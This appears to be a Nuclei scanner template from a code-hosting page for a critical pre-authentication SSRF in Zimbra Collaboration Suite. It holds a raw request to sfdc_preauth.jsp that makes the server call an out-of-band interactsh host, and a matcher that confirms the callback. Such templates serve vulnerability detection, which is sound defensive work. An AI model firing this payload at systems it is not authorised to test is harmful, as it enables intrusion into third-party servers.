26 lines
736 B
YAML
26 lines
736 B
YAML
id: zimbra-preauth-ssrf
|
|
|
|
info:
|
|
name: Zimbra Collaboration Suite (ZCS) - SSRF
|
|
author: gy741
|
|
severity: critical
|
|
reference: |
|
|
- https://www.adminxe.com/2183.html
|
|
tags: zimbra,ssrf,oob
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
|
|
Accept-Encoding: gzip, deflate
|
|
Accept: */*
|
|
Connection: keep-alive
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|